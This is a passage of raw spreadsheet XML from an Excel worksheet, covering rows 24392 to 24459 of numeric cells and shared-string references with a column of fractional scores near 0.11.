      <c r="D24392" s="2">
        <v>1.0</v>
      </c>
      <c r="E24392" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24392" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24393" ht="15.75" customHeight="1">
      <c r="A24393" s="1">
        <v>28335.0</v>
      </c>
      <c r="B24393" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C24393" s="2" t="s">
        <v>23488</v>
      </c>
      <c r="D24393" s="2">
        <v>1.0</v>
      </c>
      <c r="E24393" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24393" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24394" ht="15.75" customHeight="1">
      <c r="A24394" s="1">
        <v>29244.0</v>
      </c>
      <c r="B24394" s="2">
        <v>3.0858355E7</v>
      </c>
      <c r="C24394" s="2" t="s">
        <v>23467</v>
      </c>
      <c r="D24394" s="2">
        <v>1.0</v>
      </c>
      <c r="E24394" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24394" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24395" ht="15.75" customHeight="1">
      <c r="A24395" s="1">
        <v>29653.0</v>
      </c>
      <c r="B24395" s="2">
        <v>3.3874679E7</v>
      </c>
      <c r="C24395" s="2" t="s">
        <v>23489</v>
      </c>
      <c r="D24395" s="2">
        <v>1.0</v>
      </c>
      <c r="E24395" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24395" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24396" ht="15.75" customHeight="1">
      <c r="A24396" s="1">
        <v>29818.0</v>
      </c>
      <c r="B24396" s="2">
        <v>3.5277636E7</v>
      </c>
      <c r="C24396" s="2" t="s">
        <v>23490</v>
      </c>
      <c r="D24396" s="2">
        <v>1.0</v>
      </c>
      <c r="E24396" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24396" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24397" ht="15.75" customHeight="1">
      <c r="A24397" s="1">
        <v>30392.0</v>
      </c>
      <c r="B24397" s="2">
        <v>3.8672131E7</v>
      </c>
      <c r="C24397" s="2" t="s">
        <v>23491</v>
      </c>
      <c r="D24397" s="2">
        <v>1.0</v>
      </c>
      <c r="E24397" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24397" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24398" ht="15.75" customHeight="1">
      <c r="A24398" s="1">
        <v>30659.0</v>
      </c>
      <c r="B24398" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C24398" s="2" t="s">
        <v>23470</v>
      </c>
      <c r="D24398" s="2">
        <v>1.0</v>
      </c>
      <c r="E24398" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24398" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24399" ht="15.75" customHeight="1">
      <c r="A24399" s="1">
        <v>30683.0</v>
      </c>
      <c r="B24399" s="2">
        <v>4.2471285E7</v>
      </c>
      <c r="C24399" s="2" t="s">
        <v>23471</v>
      </c>
      <c r="D24399" s="2">
        <v>1.0</v>
      </c>
      <c r="E24399" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24399" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24400" ht="15.75" customHeight="1">
      <c r="A24400" s="1">
        <v>32018.0</v>
      </c>
      <c r="B24400" s="2">
        <v>5.348959E7</v>
      </c>
      <c r="C24400" s="2" t="s">
        <v>23492</v>
      </c>
      <c r="D24400" s="2">
        <v>1.0</v>
      </c>
      <c r="E24400" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24400" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24401" ht="15.75" customHeight="1">
      <c r="A24401" s="1">
        <v>32836.0</v>
      </c>
      <c r="B24401" s="2">
        <v>6242244.0</v>
      </c>
      <c r="C24401" s="2" t="s">
        <v>23493</v>
      </c>
      <c r="D24401" s="2">
        <v>1.0</v>
      </c>
      <c r="E24401" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24401" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24402" ht="15.75" customHeight="1">
      <c r="A24402" s="1">
        <v>32926.0</v>
      </c>
      <c r="B24402" s="2">
        <v>6423488.0</v>
      </c>
      <c r="C24402" s="2" t="s">
        <v>23494</v>
      </c>
      <c r="D24402" s="2">
        <v>1.0</v>
      </c>
      <c r="E24402" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24402" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24403" ht="15.75" customHeight="1">
      <c r="A24403" s="1">
        <v>32996.0</v>
      </c>
      <c r="B24403" s="2">
        <v>6615466.0</v>
      </c>
      <c r="C24403" s="2" t="s">
        <v>23495</v>
      </c>
      <c r="D24403" s="2">
        <v>1.0</v>
      </c>
      <c r="E24403" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24403" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24404" ht="15.75" customHeight="1">
      <c r="A24404" s="1">
        <v>34019.0</v>
      </c>
      <c r="B24404" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C24404" s="2" t="s">
        <v>23496</v>
      </c>
      <c r="D24404" s="2">
        <v>1.0</v>
      </c>
      <c r="E24404" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24404" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24405" ht="15.75" customHeight="1">
      <c r="A24405" s="1">
        <v>11482.0</v>
      </c>
      <c r="B24405" s="2">
        <v>2.199227E7</v>
      </c>
      <c r="C24405" s="2" t="s">
        <v>23497</v>
      </c>
      <c r="D24405" s="2">
        <v>1.0</v>
      </c>
      <c r="E24405" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24405" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="24406" ht="15.75" customHeight="1">
      <c r="A24406" s="1">
        <v>21428.0</v>
      </c>
      <c r="B24406" s="2">
        <v>2.2128238E7</v>
      </c>
      <c r="C24406" s="2" t="s">
        <v>23498</v>
      </c>
      <c r="D24406" s="2">
        <v>1.0</v>
      </c>
      <c r="E24406" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24406" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="24407" ht="15.75" customHeight="1">
      <c r="A24407" s="1">
        <v>22314.0</v>
      </c>
      <c r="B24407" s="2">
        <v>3.3939551E7</v>
      </c>
      <c r="C24407" s="2" t="s">
        <v>23499</v>
      </c>
      <c r="D24407" s="2">
        <v>1.0</v>
      </c>
      <c r="E24407" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24407" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="24408" ht="15.75" customHeight="1">
      <c r="A24408" s="1">
        <v>31634.0</v>
      </c>
      <c r="B24408" s="2">
        <v>5146881.0</v>
      </c>
      <c r="C24408" s="2" t="s">
        <v>17475</v>
      </c>
      <c r="D24408" s="2">
        <v>1.0</v>
      </c>
      <c r="E24408" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24408" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="24409" ht="15.75" customHeight="1">
      <c r="A24409" s="1">
        <v>32718.0</v>
      </c>
      <c r="B24409" s="2">
        <v>5972073.0</v>
      </c>
      <c r="C24409" s="2" t="s">
        <v>23500</v>
      </c>
      <c r="D24409" s="2">
        <v>1.0</v>
      </c>
      <c r="E24409" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24409" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="24410" ht="15.75" customHeight="1">
      <c r="A24410" s="1">
        <v>34135.0</v>
      </c>
      <c r="B24410" s="2">
        <v>9785857.0</v>
      </c>
      <c r="C24410" s="2" t="s">
        <v>23501</v>
      </c>
      <c r="D24410" s="2">
        <v>1.0</v>
      </c>
      <c r="E24410" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24410" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="24411" ht="15.75" customHeight="1">
      <c r="A24411" s="1">
        <v>9112.0</v>
      </c>
      <c r="B24411" s="2">
        <v>5.5200319E7</v>
      </c>
      <c r="C24411" s="2" t="s">
        <v>23502</v>
      </c>
      <c r="D24411" s="2">
        <v>1.0</v>
      </c>
      <c r="E24411" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24411" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="24412" ht="15.75" customHeight="1">
      <c r="A24412" s="1">
        <v>22113.0</v>
      </c>
      <c r="B24412" s="2">
        <v>3.0975793E7</v>
      </c>
      <c r="C24412" s="2" t="s">
        <v>23503</v>
      </c>
      <c r="D24412" s="2">
        <v>1.0</v>
      </c>
      <c r="E24412" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24412" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="24413" ht="15.75" customHeight="1">
      <c r="A24413" s="1">
        <v>22327.0</v>
      </c>
      <c r="B24413" s="2">
        <v>3.4125832E7</v>
      </c>
      <c r="C24413" s="2" t="s">
        <v>23504</v>
      </c>
      <c r="D24413" s="2">
        <v>1.0</v>
      </c>
      <c r="E24413" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24413" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="24414" ht="15.75" customHeight="1">
      <c r="A24414" s="1">
        <v>27666.0</v>
      </c>
      <c r="B24414" s="2">
        <v>2.2924248E7</v>
      </c>
      <c r="C24414" s="2" t="s">
        <v>23505</v>
      </c>
      <c r="D24414" s="2">
        <v>1.0</v>
      </c>
      <c r="E24414" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24414" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="24415" ht="15.75" customHeight="1">
      <c r="A24415" s="1">
        <v>27926.0</v>
      </c>
      <c r="B24415" s="2">
        <v>2.3782182E7</v>
      </c>
      <c r="C24415" s="2" t="s">
        <v>23506</v>
      </c>
      <c r="D24415" s="2">
        <v>1.0</v>
      </c>
      <c r="E24415" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24415" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="24416" ht="15.75" customHeight="1">
      <c r="A24416" s="1">
        <v>31689.0</v>
      </c>
      <c r="B24416" s="2">
        <v>5192460.0</v>
      </c>
      <c r="C24416" s="2" t="s">
        <v>23507</v>
      </c>
      <c r="D24416" s="2">
        <v>1.0</v>
      </c>
      <c r="E24416" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24416" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="24417" ht="15.75" customHeight="1">
      <c r="A24417" s="1">
        <v>23333.0</v>
      </c>
      <c r="B24417" s="2">
        <v>5.4661241E7</v>
      </c>
      <c r="C24417" s="2" t="s">
        <v>23508</v>
      </c>
      <c r="D24417" s="2">
        <v>1.0</v>
      </c>
      <c r="E24417" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24417" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="24418" ht="15.75" customHeight="1">
      <c r="A24418" s="1">
        <v>33359.0</v>
      </c>
      <c r="B24418" s="2">
        <v>7631011.0</v>
      </c>
      <c r="C24418" s="2" t="s">
        <v>23509</v>
      </c>
      <c r="D24418" s="2">
        <v>1.0</v>
      </c>
      <c r="E24418" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24418" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="24419" ht="15.75" customHeight="1">
      <c r="A24419" s="1">
        <v>33389.0</v>
      </c>
      <c r="B24419" s="2">
        <v>7667644.0</v>
      </c>
      <c r="C24419" s="2" t="s">
        <v>23509</v>
      </c>
      <c r="D24419" s="2">
        <v>1.0</v>
      </c>
      <c r="E24419" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24419" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="24420" ht="15.75" customHeight="1">
      <c r="A24420" s="1">
        <v>32212.0</v>
      </c>
      <c r="B24420" s="2">
        <v>5.4844602E7</v>
      </c>
      <c r="C24420" s="2" t="s">
        <v>23510</v>
      </c>
      <c r="D24420" s="2">
        <v>1.0</v>
      </c>
      <c r="E24420" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24420" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="24421" ht="15.75" customHeight="1">
      <c r="A24421" s="1">
        <v>14584.0</v>
      </c>
      <c r="B24421" s="2">
        <v>4.0134174E7</v>
      </c>
      <c r="C24421" s="2" t="s">
        <v>23511</v>
      </c>
      <c r="D24421" s="2">
        <v>1.0</v>
      </c>
      <c r="E24421" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24421" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="24422" ht="15.75" customHeight="1">
      <c r="A24422" s="1">
        <v>19088.0</v>
      </c>
      <c r="B24422" s="2">
        <v>5.4658072E7</v>
      </c>
      <c r="C24422" s="2" t="s">
        <v>23512</v>
      </c>
      <c r="D24422" s="2">
        <v>1.0</v>
      </c>
      <c r="E24422" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24422" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="24423" ht="15.75" customHeight="1">
      <c r="A24423" s="1">
        <v>19870.0</v>
      </c>
      <c r="B24423" s="2">
        <v>5.7218426E7</v>
      </c>
      <c r="C24423" s="2" t="s">
        <v>23513</v>
      </c>
      <c r="D24423" s="2">
        <v>1.0</v>
      </c>
      <c r="E24423" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24423" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="24424" ht="15.75" customHeight="1">
      <c r="A24424" s="1">
        <v>26691.0</v>
      </c>
      <c r="B24424" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C24424" s="2" t="s">
        <v>23514</v>
      </c>
      <c r="D24424" s="2">
        <v>1.0</v>
      </c>
      <c r="E24424" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24424" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="24425" ht="15.75" customHeight="1">
      <c r="A24425" s="1">
        <v>33706.0</v>
      </c>
      <c r="B24425" s="2">
        <v>8481213.0</v>
      </c>
      <c r="C24425" s="2" t="s">
        <v>23515</v>
      </c>
      <c r="D24425" s="2">
        <v>1.0</v>
      </c>
      <c r="E24425" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24425" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="24426" ht="15.75" customHeight="1">
      <c r="A24426" s="1">
        <v>14476.0</v>
      </c>
      <c r="B24426" s="2">
        <v>3.9522216E7</v>
      </c>
      <c r="C24426" s="2" t="s">
        <v>23516</v>
      </c>
      <c r="D24426" s="2">
        <v>1.0</v>
      </c>
      <c r="E24426" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24426" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="24427" ht="15.75" customHeight="1">
      <c r="A24427" s="1">
        <v>9387.0</v>
      </c>
      <c r="B24427" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C24427" s="2" t="s">
        <v>23517</v>
      </c>
      <c r="D24427" s="2">
        <v>1.0</v>
      </c>
      <c r="E24427" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24427" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="24428" ht="15.75" customHeight="1">
      <c r="A24428" s="1">
        <v>33234.0</v>
      </c>
      <c r="B24428" s="2">
        <v>7287463.0</v>
      </c>
      <c r="C24428" s="2" t="s">
        <v>23518</v>
      </c>
      <c r="D24428" s="2">
        <v>1.0</v>
      </c>
      <c r="E24428" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24428" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="24429" ht="15.75" customHeight="1">
      <c r="A24429" s="1">
        <v>34056.0</v>
      </c>
      <c r="B24429" s="2">
        <v>9595617.0</v>
      </c>
      <c r="C24429" s="2" t="s">
        <v>23519</v>
      </c>
      <c r="D24429" s="2">
        <v>1.0</v>
      </c>
      <c r="E24429" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24429" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="24430" ht="15.75" customHeight="1">
      <c r="A24430" s="1">
        <v>9900.0</v>
      </c>
      <c r="B24430" s="2">
        <v>5.6771662E7</v>
      </c>
      <c r="C24430" s="2" t="s">
        <v>23520</v>
      </c>
      <c r="D24430" s="2">
        <v>1.0</v>
      </c>
      <c r="E24430" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24430" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="24431" ht="15.75" customHeight="1">
      <c r="A24431" s="1">
        <v>21934.0</v>
      </c>
      <c r="B24431" s="2">
        <v>2.8629983E7</v>
      </c>
      <c r="C24431" s="2" t="s">
        <v>14426</v>
      </c>
      <c r="D24431" s="2">
        <v>1.0</v>
      </c>
      <c r="E24431" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24431" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="24432" ht="15.75" customHeight="1">
      <c r="A24432" s="1">
        <v>24465.0</v>
      </c>
      <c r="B24432" s="2">
        <v>1.0952128E7</v>
      </c>
      <c r="C24432" s="2" t="s">
        <v>1045</v>
      </c>
      <c r="D24432" s="2">
        <v>1.0</v>
      </c>
      <c r="E24432" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24432" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="24433" ht="15.75" customHeight="1">
      <c r="A24433" s="1">
        <v>30154.0</v>
      </c>
      <c r="B24433" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C24433" s="2" t="s">
        <v>23521</v>
      </c>
      <c r="D24433" s="2">
        <v>1.0</v>
      </c>
      <c r="E24433" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24433" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="24434" ht="15.75" customHeight="1">
      <c r="A24434" s="1">
        <v>31235.0</v>
      </c>
      <c r="B24434" s="2">
        <v>4.9276468E7</v>
      </c>
      <c r="C24434" s="2" t="s">
        <v>23522</v>
      </c>
      <c r="D24434" s="2">
        <v>1.0</v>
      </c>
      <c r="E24434" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24434" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="24435" ht="15.75" customHeight="1">
      <c r="A24435" s="1">
        <v>32173.0</v>
      </c>
      <c r="B24435" s="2">
        <v>5.4639758E7</v>
      </c>
      <c r="C24435" s="2" t="s">
        <v>23523</v>
      </c>
      <c r="D24435" s="2">
        <v>1.0</v>
      </c>
      <c r="E24435" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24435" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="24436" ht="15.75" customHeight="1">
      <c r="A24436" s="1">
        <v>25510.0</v>
      </c>
      <c r="B24436" s="2">
        <v>1.4156629E7</v>
      </c>
      <c r="C24436" s="2" t="s">
        <v>23524</v>
      </c>
      <c r="D24436" s="2">
        <v>1.0</v>
      </c>
      <c r="E24436" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24436" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="24437" ht="15.75" customHeight="1">
      <c r="A24437" s="1">
        <v>12777.0</v>
      </c>
      <c r="B24437" s="2">
        <v>3.1304581E7</v>
      </c>
      <c r="C24437" s="2" t="s">
        <v>23525</v>
      </c>
      <c r="D24437" s="2">
        <v>1.0</v>
      </c>
      <c r="E24437" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24437" s="2">
        <v>0.1138433515482695</v>
      </c>
    </row>
    <row r="24438" ht="15.75" customHeight="1">
      <c r="A24438" s="1">
        <v>16808.0</v>
      </c>
      <c r="B24438" s="2">
        <v>4.7796443E7</v>
      </c>
      <c r="C24438" s="2" t="s">
        <v>23526</v>
      </c>
      <c r="D24438" s="2">
        <v>1.0</v>
      </c>
      <c r="E24438" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24438" s="2">
        <v>0.1138433515482695</v>
      </c>
    </row>
    <row r="24439" ht="15.75" customHeight="1">
      <c r="A24439" s="1">
        <v>8211.0</v>
      </c>
      <c r="B24439" s="2">
        <v>5.3309627E7</v>
      </c>
      <c r="C24439" s="2" t="s">
        <v>23527</v>
      </c>
      <c r="D24439" s="2">
        <v>1.0</v>
      </c>
      <c r="E24439" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24439" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="24440" ht="15.75" customHeight="1">
      <c r="A24440" s="1">
        <v>24967.0</v>
      </c>
      <c r="B24440" s="2">
        <v>1.260535E7</v>
      </c>
      <c r="C24440" s="2" t="s">
        <v>23528</v>
      </c>
      <c r="D24440" s="2">
        <v>1.0</v>
      </c>
      <c r="E24440" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24440" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="24441" ht="15.75" customHeight="1">
      <c r="A24441" s="1">
        <v>29256.0</v>
      </c>
      <c r="B24441" s="2">
        <v>3.0935286E7</v>
      </c>
      <c r="C24441" s="2" t="s">
        <v>23529</v>
      </c>
      <c r="D24441" s="2">
        <v>1.0</v>
      </c>
      <c r="E24441" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24441" s="2">
        <v>0.1137992831541218</v>
      </c>
    </row>
    <row r="24442" ht="15.75" customHeight="1">
      <c r="A24442" s="1">
        <v>3455.0</v>
      </c>
      <c r="B24442" s="2">
        <v>3.8281303E7</v>
      </c>
      <c r="C24442" s="2" t="s">
        <v>23530</v>
      </c>
      <c r="D24442" s="2">
        <v>1.0</v>
      </c>
      <c r="E24442" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24442" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24443" ht="15.75" customHeight="1">
      <c r="A24443" s="1">
        <v>18145.0</v>
      </c>
      <c r="B24443" s="2">
        <v>5.1850361E7</v>
      </c>
      <c r="C24443" s="2" t="s">
        <v>23531</v>
      </c>
      <c r="D24443" s="2">
        <v>1.0</v>
      </c>
      <c r="E24443" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24443" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24444" ht="15.75" customHeight="1">
      <c r="A24444" s="1">
        <v>19545.0</v>
      </c>
      <c r="B24444" s="2">
        <v>5.6030506E7</v>
      </c>
      <c r="C24444" s="2" t="s">
        <v>23532</v>
      </c>
      <c r="D24444" s="2">
        <v>1.0</v>
      </c>
      <c r="E24444" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24444" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24445" ht="15.75" customHeight="1">
      <c r="A24445" s="1">
        <v>23949.0</v>
      </c>
      <c r="B24445" s="2">
        <v>8900810.0</v>
      </c>
      <c r="C24445" s="2" t="s">
        <v>23533</v>
      </c>
      <c r="D24445" s="2">
        <v>1.0</v>
      </c>
      <c r="E24445" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24445" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24446" ht="15.75" customHeight="1">
      <c r="A24446" s="1">
        <v>24435.0</v>
      </c>
      <c r="B24446" s="2">
        <v>1.0866929E7</v>
      </c>
      <c r="C24446" s="2" t="s">
        <v>23534</v>
      </c>
      <c r="D24446" s="2">
        <v>1.0</v>
      </c>
      <c r="E24446" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24446" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24447" ht="15.75" customHeight="1">
      <c r="A24447" s="1">
        <v>24639.0</v>
      </c>
      <c r="B24447" s="2">
        <v>1.1478949E7</v>
      </c>
      <c r="C24447" s="2" t="s">
        <v>23535</v>
      </c>
      <c r="D24447" s="2">
        <v>1.0</v>
      </c>
      <c r="E24447" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24447" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24448" ht="15.75" customHeight="1">
      <c r="A24448" s="1">
        <v>30321.0</v>
      </c>
      <c r="B24448" s="2">
        <v>3.8042795E7</v>
      </c>
      <c r="C24448" s="2" t="s">
        <v>23536</v>
      </c>
      <c r="D24448" s="2">
        <v>1.0</v>
      </c>
      <c r="E24448" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24448" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24449" ht="15.75" customHeight="1">
      <c r="A24449" s="1">
        <v>30434.0</v>
      </c>
      <c r="B24449" s="2">
        <v>3.9040832E7</v>
      </c>
      <c r="C24449" s="2" t="s">
        <v>23537</v>
      </c>
      <c r="D24449" s="2">
        <v>1.0</v>
      </c>
      <c r="E24449" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24449" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24450" ht="15.75" customHeight="1">
      <c r="A24450" s="1">
        <v>32027.0</v>
      </c>
      <c r="B24450" s="2">
        <v>5.3599873E7</v>
      </c>
      <c r="C24450" s="2" t="s">
        <v>23538</v>
      </c>
      <c r="D24450" s="2">
        <v>1.0</v>
      </c>
      <c r="E24450" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24450" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="24451" ht="15.75" customHeight="1">
      <c r="A24451" s="1">
        <v>23360.0</v>
      </c>
      <c r="B24451" s="2">
        <v>5.5077633E7</v>
      </c>
      <c r="C24451" s="2" t="s">
        <v>23539</v>
      </c>
      <c r="D24451" s="2">
        <v>1.0</v>
      </c>
      <c r="E24451" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24451" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="24452" ht="15.75" customHeight="1">
      <c r="A24452" s="1">
        <v>25260.0</v>
      </c>
      <c r="B24452" s="2">
        <v>1.3388906E7</v>
      </c>
      <c r="C24452" s="2" t="s">
        <v>23540</v>
      </c>
      <c r="D24452" s="2">
        <v>1.0</v>
      </c>
      <c r="E24452" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24452" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="24453" ht="15.75" customHeight="1">
      <c r="A24453" s="1">
        <v>19437.0</v>
      </c>
      <c r="B24453" s="2">
        <v>5.5702898E7</v>
      </c>
      <c r="C24453" s="2" t="s">
        <v>23541</v>
      </c>
      <c r="D24453" s="2">
        <v>1.0</v>
      </c>
      <c r="E24453" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24453" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="24454" ht="15.75" customHeight="1">
      <c r="A24454" s="1">
        <v>22153.0</v>
      </c>
      <c r="B24454" s="2">
        <v>3.1310451E7</v>
      </c>
      <c r="C24454" s="2" t="s">
        <v>23542</v>
      </c>
      <c r="D24454" s="2">
        <v>1.0</v>
      </c>
      <c r="E24454" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24454" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="24455" ht="15.75" customHeight="1">
      <c r="A24455" s="1">
        <v>10425.0</v>
      </c>
      <c r="B24455" s="2">
        <v>1.0331374E7</v>
      </c>
      <c r="C24455" s="2" t="s">
        <v>23543</v>
      </c>
      <c r="D24455" s="2">
        <v>1.0</v>
      </c>
      <c r="E24455" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24455" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24456" ht="15.75" customHeight="1">
      <c r="A24456" s="1">
        <v>14009.0</v>
      </c>
      <c r="B24456" s="2">
        <v>3.74073E7</v>
      </c>
      <c r="C24456" s="2" t="s">
        <v>23544</v>
      </c>
      <c r="D24456" s="2">
        <v>1.0</v>
      </c>
      <c r="E24456" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24456" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24457" ht="15.75" customHeight="1">
      <c r="A24457" s="1">
        <v>19278.0</v>
      </c>
      <c r="B24457" s="2">
        <v>5.5161602E7</v>
      </c>
      <c r="C24457" s="2" t="s">
        <v>23545</v>
      </c>
      <c r="D24457" s="2">
        <v>1.0</v>
      </c>
      <c r="E24457" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24457" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24458" ht="15.75" customHeight="1">
      <c r="A24458" s="1">
        <v>20859.0</v>
      </c>
      <c r="B24458" s="2">
        <v>1.5820312E7</v>
      </c>
      <c r="C24458" s="2" t="s">
        <v>23546</v>
      </c>
      <c r="D24458" s="2">
        <v>1.0</v>
      </c>
      <c r="E24458" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24458" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24459" ht="15.75" customHeight="1">
      <c r="A24459" s="1">
        <v>23590.0</v>
      </c>
      <c r="B24459" s="2">
        <v>6341704.0</v>
      </c>
      <c r="C24459" s="2" t="s">
        <v>23547</v>
      </c>
      <c r="D24459" s="2">
        <v>1.0</v>
